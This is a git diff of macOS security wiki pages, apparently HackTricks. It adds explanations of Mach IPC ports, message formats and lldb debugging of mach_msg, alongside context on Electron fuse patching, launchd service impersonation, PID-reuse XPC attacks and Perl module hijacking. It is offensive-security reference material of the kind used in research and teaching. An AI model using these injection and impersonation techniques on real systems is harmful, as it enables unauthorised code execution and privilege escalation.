+<figure><img src="../../.gitbook/assets/image (1164).png" alt="" width="563"><figcaption></figcaption></figure>
 
 Right click on the variable -> Retype Variable and select in this case **`swift_dispatch_block`**:
 
-<figure><img src="../../.gitbook/assets/image (1162).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1165).png" alt="" width="563"><figcaption></figcaption></figure>
 
 Ghidra will automatically rewrite everything:
 
-<figure><img src="../../.gitbook/assets/image (1163).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1166).png" alt="" width="563"><figcaption></figcaption></figure>
 
 ## References
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
index 6f232d28b..00881b7c0 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@@ -64,7 +64,7 @@ Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions
 
 You could load this file in [https://hexed.it/](https://hexed.it/) and search for the previous string. After this string you can see in ASCII a number "0" or "1" indicating if each fuse is disabled or enabled. Just modify the hex code (`0x30` is `0` and `0x31` is `1`) to **modify the fuse values**.
 
-<figure><img src="../../../.gitbook/assets/image (31).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>
 
 Note that if you try to **overwrite** the **`Electron Framework` binary** inside an application with these bytes modified, the app won't run.
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
index 125bb87fb..66ae7f20f 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md
@@ -20,7 +20,9 @@ Other ways to support HackTricks:
 
 Mach uses **tasks** as the **smallest unit** for sharing resources, and each task can contain **multiple threads**. These **tasks and threads are mapped 1:1 to POSIX processes and threads**.
 
-Communication between tasks occurs via Mach Inter-Process Communication (IPC), utilising one-way communication channels. **Messages are transferred between ports**, which act like **message queues** managed by the kernel.
+Communication between tasks occurs via Mach Inter-Process Communication (IPC), utilising one-way communication channels. **Messages are transferred between ports**, which act kind of **message queues** managed by the kernel.
+
+A **port** is the **basic** element of Mach IPC. It can be used to **send messages and to receive** them.
 
 Each process has an **IPC table**, in there it's possible to find the **mach ports of the process**. The name of a mach port is actually a number (a pointer to the kernel object).
 
@@ -32,9 +34,12 @@ Port rights, which define what operations a task can perform, are key to this co
 
 * **Receive right**, which allows receiving messages sent to the port. Mach ports are MPSC (multiple-producer, single-consumer) queues, which means that there may only ever be **one receive right for each port** in the whole system (unlike with pipes, where multiple processes can all hold file descriptors to the read end of one pipe).
   * A **task with the Receive** right can receive messages and **create Send rights**, allowing it to send messages. Originally only the **own task has Receive right over its por**t.
+  * If the owner of the Receive right **dies** or kills it, the **send right became useless (dead name).**
 * **Send right**, which allows sending messages to the port.
   * The Send right can be **cloned** so a task owning a Send right can clone the right and **grant it to a third task**.
+  * Note that **port rights** can also be **passed** though Mac messages.
 * **Send-once right**, which allows sending one message to the port and then disappears.
+  * This right **cannot** be **cloned**, but it can be **moved**.
 * **Port set right**, which denotes a _port set_ rather than a single port. Dequeuing a message from a port set dequeues a message from one of the ports it contains. Port sets can be used to listen on several ports simultaneously, a lot like `select`/`poll`/`epoll`/`kqueue` in Unix.
 * **Dead name**, which is not an actual port right, but merely a placeholder. When a port is destroyed, all existing port rights to the port turn into dead names.
 
@@ -46,16 +51,19 @@ File ports allows to encapsulate file descriptors in Mac ports (using Mach port
 
 ### Establishing a communication
 
-#### Steps:
+As mentioned previously, it's possible to send rights using Mach messages, however, you **cannot send a right without already having a right** to send a Mach message. So, how is the first communication stablished?
 
-As it's mentioned, in order to establish the communication channel, the **bootstrap server** (**launchd** in mac) is involved.
+For this, he **bootstrap server** (**launchd** in mac) is involved, as **everyone can get a SEND right to the bootstrap server**, it's possible to ask it for a right to send a message to another process:
 
-1. Task **A** initiates a **new port**, obtaining a **RECEIVE right** in the process.
+1. Task **A** creates a **new port**, getting the **RECEIVE right** over it.
 2. Task **A**, being the holder of the RECEIVE right, **generates a SEND right for the port**.
-3. Task **A** establishes a **connection** with the **bootstrap server**, providing the **port's service name** and the **SEND right** through a procedure known as the bootstrap register.
-4. Task **B** interacts with the **bootstrap server** to execute a bootstrap **lookup for the service** name. If successful, the **server duplicates the SEND right** received from Task A and **transmits it to Task B**.
-5. Upon acquiring a SEND right, Task **B** is capable of **formulating** a **message** and dispatching it **to Task A**.
-6. For a bi-directional communication usually task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** so it can send messages to TASK B (bi-directional communication).
+3. Task **A** establishes a **connection** with the **bootstrap server**, and **sends it the SEND right** for the port it generated at the beginning.
+   * Remember that anyone can get a SEND right to the bootstrap server.
+4. Task A sends a `bootstrap_register` message to the bootstrap server to **associate the given port with a name** like `com.apple.taska`
+5. Task **B** interacts with the **bootstrap server** to execute a bootstrap **lookup for the service** name (`bootstrap_lookup`). So the bootstrap server can respond, task B will send it a **SEND right to a port it previously created** inside the lookup message. If the lookup is successful, the **server duplicates the SEND right** received from Task A and **transmits it to Task B**.
+   * Remember that anyone can get a SEND right to the bootstrap server.
+6. With this SEND right, **Task B** is capable of **sending** a **message** **to Task A**.
+7. For a bi-directional communication usually task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** so it can send messages to TASK B (bi-directional communication).
 
 The bootstrap server **cannot authenticate** the service name claimed by a task. This means a **task** could potentially **impersonate any system task**, such as falsely **claiming an authorization service name** and then approving every request.
 
@@ -65,12 +73,16 @@ For these predefined services, the **lookup process differs slightly**. When a s
 
 * Task **B** initiates a bootstrap **lookup** for a service name.
 * **launchd** checks if the task is running and if it isn’t, **starts** it.
-* Task **A** (the service) performs a **bootstrap check-in**. Here, the **bootstrap** server creates a SEND right, retains it, and **transfers the RECEIVE right to Task A**.
+* Task **A** (the service) performs a **bootstrap check-in** (`bootstrap_check_in()`). Here, the **bootstrap** server creates a SEND right, retains it, and **transfers the RECEIVE right to Task A**.
 * launchd duplicates the **SEND right and sends it to Task B**.
 * Task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** (the svc) so it can send messages to TASK B (bi-directional communication).
 
 However, this process only applies to predefined system tasks. Non-system tasks still operate as described originally, which could potentially allow for impersonation.
 
+{% hint style="danger" %}
+Therefore, launchd should never crash or the whole sysem will crash.
+{% endhint %}
+
 ### A Mach Message
 
 [Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
@@ -90,7 +102,32 @@ typedef struct {
 
 Processes possessing a _**receive right**_ can receive messages on a Mach port. Conversely, the **senders** are granted a _**send**_ or a _**send-once right**_. The send-once right is exclusively for sending a single message, after which it becomes invalid.
 
-In order to achieve an easy **bi-directional communication** a process can specify a **mach port** in the mach **message header** called the _reply port_ (**`msgh_local_port`**) where the **receiver** of the message can **send a reply** to this message. The bitflags in **`msgh_bits`** can be used to **indicate** that a **send-once** **right** should be derived and transferred for this port (`MACH_MSG_TYPE_MAKE_SEND_ONCE`).
+The initial field **`msgh_bits`** is a bitmap:
+
+* First bit (most significative) is used to indicate that a message is complex (more on this below)
+* The 3rd and 4th are used by the kernel
+* The **5 least significant bits of the 2nd byte** from can be used for **voucher**: another type of port to send key/value combinations.
+* The **5 least significant bits of the 3rd byte** from can be used for **local port**
+* The **5 least significant bits of the 4th byte** from can be used for **remote port**
+
+The types that can be specified in the voucher, local and remote ports are (from [**mach/message.h**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)):
+
+```c
+#define MACH_MSG_TYPE_MOVE_RECEIVE      16      /* Must hold receive right */
+#define MACH_MSG_TYPE_MOVE_SEND         17      /* Must hold send right(s) */
+#define MACH_MSG_TYPE_MOVE_SEND_ONCE    18      /* Must hold sendonce right */
+#define MACH_MSG_TYPE_COPY_SEND         19      /* Must hold send right(s) */
+#define MACH_MSG_TYPE_MAKE_SEND         20      /* Must hold receive right */
+#define MACH_MSG_TYPE_MAKE_SEND_ONCE    21      /* Must hold receive right */
+#define MACH_MSG_TYPE_COPY_RECEIVE      22      /* NOT VALID */
+#define MACH_MSG_TYPE_DISPOSE_RECEIVE   24      /* must hold receive right */
+#define MACH_MSG_TYPE_DISPOSE_SEND      25      /* must hold send right(s) */
+#define MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26      /* must hold sendonce right */
+```
+
+For example, `MACH_MSG_TYPE_MAKE_SEND_ONCE` can be used to **indicate** that a **send-once** **right** should be derived and transferred for this port. It can also be specified `MACH_PORT_NULL` to prevent the recipient to be able to reply.
+
+In order to achieve an easy **bi-directional communication** a process can specify a **mach port** in the mach **message header** called the _reply port_ (**`msgh_local_port`**) where the **receiver** of the message can **send a reply** to this message.
 
 {% hint style="success" %}
 Note that this kind of bi-directional communication is used in XPC messages that expect a replay (`xpc_connection_send_message_with_reply` and `xpc_connection_send_message_with_reply_sync`). But **usually different ports are created** as explained previously to create the bi-directional communication.
@@ -104,13 +141,172 @@ The other fields of the message header are:
 * `msgh_id`: the ID of this message, which is interpreted by the receiver.
 
 {% hint style="danger" %}
-Note that **mach messages are sent over a \_mach port**\_, which is a **single receiver**, **multiple sender** communication channel built into the mach kernel. **Multiple processes** can **send messages** to a mach port, but at any point only **a single process can read** from it.
+Note that **mach messages are sent over a `mach port`**, which is a **single receiver**, **multiple sender** communication channel built into the mach kernel. **Multiple processes** can **send messages** to a mach port, but at any point only **a single process can read** from it.
 {% endhint %}
 
+Messages are then formed by the **`mach_msg_header_t`** header followed by the **body** and by the **trailer** (if any) and it can grant permission to reply to it. In these cases, the kernel just need to pass the message from one task to the other.
+
+A **trailer** is **information added to the message by the kernel** (cannot be set by the user) which can be requested in message reception with the flags `MACH_RCV_TRAILER_<trailer_opt>` (there is different information that can be requested).
+
+#### Complex Messages
+
+However, there are other more **complex** messages, like the ones passing additional port rights or sharing memory, where the kernel also needs to send these objects to the recipient. In this cases the most significant bit of the header `msgh_bits` is set.
+
+The possible descriptors to pass are defined in [**`mach/message.h`**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html):
+
+```c
+#define MACH_MSG_PORT_DESCRIPTOR                0
+#define MACH_MSG_OOL_DESCRIPTOR                 1
+#define MACH_MSG_OOL_PORTS_DESCRIPTOR           2
+#define MACH_MSG_OOL_VOLATILE_DESCRIPTOR        3
+#define MACH_MSG_GUARDED_PORT_DESCRIPTOR        4
+
+#pragma pack(push, 4)
+
+typedef struct{
+	natural_t                     pad1;
+	mach_msg_size_t               pad2;
+	unsigned int                  pad3 : 24;
+	mach_msg_descriptor_type_t    type : 8;
+} mach_msg_type_descriptor_t;
+```
+
+In 32bits, all the descriptors are 12B and the descriptor type is in the 11th one. In 64 bits, the sizes vary.
+
+{% hint style="danger" %}
+The kernel will copy the descriptors from one task to the other but first **creating a copy in kernel memory**. This technique, known as "Feng Shui" has been abused in several exploits to make the **kernel copy data in its memory** making a process send descriptors to itself. Then the process can receive the messages (the kernel will free them).
+
+It's also possible to **send port rights to a vulnerable process**, and the port rights will just appear in the process (even if he isn't handling them).
+{% endhint %}
+
+### Mac Ports APIs
+
+Note that ports are associated to the task namespace, so to create or search for a port, the task namespace is also queried (more in `mach/mach_port.h`):
+
+* **`mach_port_allocate` | `mach_port_construct`**: **Create** a port.
+  * `mach_port_allocate` can also create a **port set**: receive right over a group of ports. Whenever a message is received it's indicated the port from where it was.
+* `mach_port_allocate_name`: Change the name of the port (by default 32bit integer)
+* `mach_port_names`: Get port names from a target
+* `mach_port_type`: Get rights of a task over a name
+* `mach_port_rename`: Rename a port (like dup2 for FDs)
+* `mach_port_allocate`: Allocate a new RECEIVE, PORT\_SET or DEAD\_NAME
+* `mach_port_insert_right`: Create a new right in a port where you have RECEIVE
+* `mach_port_...`
+* **`mach_msg`** | **`mach_msg_overwrite`**: Functions used to **send and receive mach messages**. The overwrite version allows to specify a different buffer for message reception (the other version will just reuse it).
+
+### Debug mach\_msg
+
+As the functions **`mach_msg`** and **`mach_msg_overwrite`** are the ones used to send a receive messages, setting a breakpoint on them would allow to inspect the sent a received messages.
+
+For example start debugging any application you can debug as it will load **`libSystem.B` which will use this function**.
+
+<pre class="language-armasm"><code class="lang-armasm"><strong>(lldb) b mach_msg
+</strong>Breakpoint 1: where = libsystem_kernel.dylib`mach_msg, address = 0x00000001803f6c20
+<strong>(lldb) r
+</strong>Process 71019 launched: '/Users/carlospolop/Desktop/sandboxedapp/SandboxedShellAppDown.app/Contents/MacOS/SandboxedShellApp' (arm64)
+Process 71019 stopped
+* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
+    frame #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg
+libsystem_kernel.dylib`mach_msg:
+->  0x181d3ac20 &#x3C;+0>:  pacibsp
+    0x181d3ac24 &#x3C;+4>:  sub    sp, sp, #0x20
+    0x181d3ac28 &#x3C;+8>:  stp    x29, x30, [sp, #0x10]
+    0x181d3ac2c &#x3C;+12>: add    x29, sp, #0x10
+Target 0: (SandboxedShellApp) stopped.
+<strong>(lldb) bt
+</strong>* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
+  * frame #0: 0x0000000181d3ac20 libsystem_kernel.dylib`mach_msg
+    frame #1: 0x0000000181ac3454 libxpc.dylib`_xpc_pipe_mach_msg + 56
+    frame #2: 0x0000000181ac2c8c libxpc.dylib`_xpc_pipe_routine + 388
+    frame #3: 0x0000000181a9a710 libxpc.dylib`_xpc_interface_routine + 208
+    frame #4: 0x0000000181abbe24 libxpc.dylib`_xpc_init_pid_domain + 348
+    frame #5: 0x0000000181abb398 libxpc.dylib`_xpc_uncork_pid_domain_locked + 76
+    frame #6: 0x0000000181abbbfc libxpc.dylib`_xpc_early_init + 92
+    frame #7: 0x0000000181a9583c libxpc.dylib`_libxpc_initializer + 1104
+    frame #8: 0x000000018e59e6ac libSystem.B.dylib`libSystem_initializer + 236
+    frame #9: 0x0000000181a1d5c8 dyld`invocation function for block in dyld4::Loader::findAndRunAllInitializers(dyld4::RuntimeState&#x26;) const::$_0::operator()() const + 168
+</code></pre>
+
+To get the arguments of **`mach_msg`** check the registers. These are the arguments (from [mach/message.h](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)):
+
+```c
+__WATCHOS_PROHIBITED __TVOS_PROHIBITED
+extern mach_msg_return_t        mach_msg(
+	mach_msg_header_t *msg,
+	mach_msg_option_t option,
+	mach_msg_size_t send_size,
+	mach_msg_size_t rcv_size,
+	mach_port_name_t rcv_name,
+	mach_msg_timeout_t timeout,
+	mach_port_name_t notify);
+```
+
+Get the values from the registries:
+
+```armasm
+reg read $x0 $x1 $x2 $x3 $x4 $x5 $x6
+      x0 = 0x0000000124e04ce8 ;mach_msg_header_t (*msg)
+      x1 = 0x0000000003114207 ;mach_msg_option_t (option)
+      x2 = 0x0000000000000388 ;mach_msg_size_t (send_size)
+      x3 = 0x0000000000000388 ;mach_msg_size_t (rcv_size)
+      x4 = 0x0000000000001f03 ;mach_port_name_t (rcv_name)
+      x5 = 0x0000000000000000 ;mach_msg_timeout_t (timeout)
+      x6 = 0x0000000000000000 ;mach_port_name_t (notify)
+```
+
+Inspect the message header checking the first argument:
+
+```armasm
+(lldb) x/6w $x0
+0x124e04ce8: 0x00131513 0x00000388 0x00000807 0x00001f03
+0x124e04cf8: 0x00000b07 0x40000322
+
+; 0x00131513 -> mach_msg_bits_t (msgh_bits) = 0x13 (MACH_MSG_TYPE_COPY_SEND) in local | 0x1500 (MACH_MSG_TYPE_MAKE_SEND_ONCE) in remote | 0x130000 (MACH_MSG_TYPE_COPY_SEND) in voucher
+; 0x00000388 -> mach_msg_size_t (msgh_size)
+; 0x00000807 -> mach_port_t (msgh_remote_port)
+; 0x00001f03 -> mach_port_t (msgh_local_port)
+; 0x00000b07 -> mach_port_name_t (msgh_voucher_port)
+; 0x40000322 -> mach_msg_id_t (msgh_id)
+```
+
+That type of `mach_msg_bits_t` is very common to allow a reply.
+
+
+
 ### Enumerate ports
 
 ```bash
 lsmp -p <pid>
+
+sudo lsmp -p 1 
+Process (1) : launchd
+  name      ipc-object    rights     flags   boost  reqs  recv  send sonce oref  qlimit  msgcount  context            identifier  type
+---------   ----------  ----------  -------- -----  ---- ----- ----- ----- ----  ------  --------  ------------------ ----------- ------------
+0x00000203  0x181c4e1d  send        --------        ---            2                                                  0x00000000  TASK-CONTROL SELF (1) launchd
+0x00000303  0x183f1f8d  recv        --------     0  ---      1               N        5         0  0x0000000000000000
+0x00000403  0x183eb9dd  recv        --------     0  ---      1               N        5         0  0x0000000000000000
+0x0000051b  0x1840cf3d  send        --------        ---            2        ->        6         0  0x0000000000000000 0x00011817  (380) WindowServer
+0x00000603  0x183f698d  recv        --------     0  ---      1               N        5         0  0x0000000000000000
+0x0000070b  0x175915fd  recv,send   ---GS---     0  ---      1     2         Y        5         0  0x0000000000000000
+0x00000803  0x1758794d  send        --------        ---            1                                                  0x00000000  CLOCK
+0x0000091b  0x192c71fd  send        --------        D--            1        ->        1         0  0x0000000000000000 0x00028da7  (418) runningboardd
+0x00000a6b  0x1d4a18cd  send        --------        ---            2        ->       16         0  0x0000000000000000 0x00006a03  (92247) Dock
+0x00000b03  0x175a5d4d  send        --------        ---            2        ->       16         0  0x0000000000000000 0x00001803  (310) logd
+[...]
+0x000016a7  0x192c743d  recv,send   --TGSI--     0  ---      1     1         Y       16         0  0x0000000000000000
+                  +     send        --------        ---            1         <-                                       0x00002d03  (81948) seserviced
+                  +     send        --------        ---            1         <-                                       0x00002603  (74295) passd
+                  [...]
+```
+
+The **name** is the default name given to the port (check how it's **increasing** in the first 3 bytes). The **`ipc-object`** is the **obfuscated** unique **identifier** of the port.\
+Note also how the ports with only **`send`** right are **identifying the owner** of it (port name + pid).\
+Also note the use of **`+`** to indicate **other tasks connected to the same port**.
+
+It's also possible to use [**procesxp**](https://www.newosxbook.com/tools/procexp.html) to see also the **registered service names** (with SIP disabled due to the need of `com.apple.system-task-port`):
+
+```
+procesp 1 ports
 ```
 
 You can install this tool in iOS downloading it from [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz)
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
index a3d6c0460..e839320e4 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
@@ -343,9 +343,9 @@ This is the same function decompiled in a difefrent Hopper free version:
 
 Actually if you go to the function **`0x100004000`** you will find the array of **`routine_descriptor`** structs. The first element of the struct is the **address** where the **function** is implemented, and the **struct takes 0x28 bytes**, so each 0x28 bytes (starting from byte 0) you can get 8 bytes and that will be the **address of the function** that will be called:
 
-<figure><img src="../../../../.gitbook/assets/image (32).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure>
 
-<figure><img src="../../../../.gitbook/assets/image (33).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (36).png" alt=""><figcaption></figcaption></figure>
 
 This data can be extracted [**using this Hopper script**](https://github.com/knightsc/hopper/blob/master/scripts/MIG%20Detect.py).
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
index 150351e42..ea6c067ce 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
@@ -303,7 +303,7 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
 
 If you find the function: **`[HelperTool checkAuthorization:command:]`** it's probably the the process is using the previously mentioned schema for authorization:
 
-<figure><img src="../../../../../.gitbook/assets/image (39).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (42).png" alt=""><figcaption></figcaption></figure>
 
 Thisn, if this function is calling functions such as `AuthorizationCreateFromExternalForm`, `authorizationRightForCommand`, `AuthorizationCopyRights`, `AuhtorizationFree`, it's using [**EvenBetterAuthorizationSample**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L101-L154).
 
@@ -315,7 +315,7 @@ Then, you need to find the protocol schema in order to be able to establish a co
 
 The function **`shouldAcceptNewConnection`** indicates the protocol being exported:
 
-<figure><img src="../../../../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (44).png" alt=""><figcaption></figcaption></figure>
 
 In this case, we have the same as in EvenBetterAuthorizationSample, [**check this line**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94).
 
@@ -339,7 +339,7 @@ Lastly, we just need to know the **name of the exposed Mach Service** in order t
 
 * In the **`[HelperTool init]`** where you can see the Mach Service being used:
 
-<figure><img src="../../../../../.gitbook/assets/image (38).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure>
 
 * In the launchd plist:
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
index a50f79171..d7c67963f 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
@@ -25,7 +25,7 @@ This function will make the **allowed binary own the PID** but the **malicious X
 If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's **verifying the process PID** and not the audit token.\
 Like for example in this image (taken from the reference):
 
-<figure><img src="../../../../../../.gitbook/assets/image (303).png" alt="https://wojciechregula.blog/images/2020/04/pid.png"><figcaption></figcaption></figure>
+<figure><img src="../../../../../../.gitbook/assets/image (306).png" alt="https://wojciechregula.blog/images/2020/04/pid.png"><figcaption></figcaption></figure>
 
 Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
index 1689cb669..50bb7e19d 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md
@@ -118,7 +118,7 @@ Below is a visual representation of the described attack scenario:
 
 !\[https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/variant2.png]\(../../../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png)
 
-<figure><img src="../../../../../../.gitbook/assets/image (30).png" alt="https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/variant2.png" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../../../../.gitbook/assets/image (33).png" alt="https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/variant2.png" width="563"><figcaption></figcaption></figure>
 
 ## Discovery Problems
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
index fe173ad71..f5b5cbfec 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
@@ -78,7 +78,7 @@ Some of the returned folders doesn't even exist, however, **`/Library/Perl/5.30`
 However, note that you **need to be root to write in that folder** and nowadays you will get this **TCC prompt**:
 {% endhint %}
 
-<figure><img src="../../../.gitbook/assets/image (25).png" alt="" width="244"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (28).png" alt="" width="244"><figcaption></figcaption></figure>
 
 For example, if a script is importing **`use File::Basename;`** it would be possible to create `/Library/Perl/5.30/File/Basename.pm` to make it execute arbitrary code.
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
index 5ea1b848a..8e5db5d87 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
@@ -73,7 +73,7 @@ The MRT application is located in **`/Library/Apple/System/Library/CoreServices/
 
 **macOS** now **alerts** every time a tool uses a well known **technique to persist code execution** (such as Login Items, Daemons...), so the user knows better **which software is persisting**.
 
-<figure><img src="../../../.gitbook/assets/image (1180).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1183).png" alt=""><figcaption></figcaption></figure>
 
 This runs with a **daemon** located in `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Versions/A/Resources/backgroundtaskmanagementd` and the **agent** in `/System/Library/PrivateFrameworks/BackgroundTaskManagement.framework/Support/BackgroundTaskManagementAgent.app`
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
index 055cc8def..6372b8e75 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
@@ -130,7 +130,7 @@ Allows to **change** the **`NFSHomeDirectory`** attribute of a user that changes
 
 Allow to modify files inside apps bundle (inside app.app), which is **disallowed by default**.
 
-<figure><img src="../../../.gitbook/assets/image (28).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (31).png" alt=""><figcaption></figcaption></figure>
 
 It's possible to check who has this access in _System Settings_ > _Privacy & Security_ > _App Management._
 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
index a8a7a53ab..e66da3bdb 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
@@ -12,11 +12,10 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## Gatekeeper
 
 **Gatekeeper** is a security feature developed for Mac operating systems, designed to ensure that users **run only trusted software** on their systems. It functions by **validating software** that a user downloads and attempts to open from **sources outside the App Store**, such as an app, a plug-in, or an installer package.
@@ -85,7 +84,7 @@ Note that GateKeeper signature checks are performed only to **files with the Qua
 
 GateKeeper will check if according to the **preferences & the signature** a binary can be executed:
 
-<figure><img src="../../../.gitbook/assets/image (1147).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1150).png" alt=""><figcaption></figcaption></figure>
 
 The database that keeps this configuration ins located in **`/var/db/SystemPolicy`**. You can check this database as root with:
 
@@ -139,7 +138,7 @@ spctl --master-enable
 
 When completely enabled, a new option will appear:
 
-<figure><img src="../../../.gitbook/assets/image (1148).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1151).png" alt=""><figcaption></figcaption></figure>
 
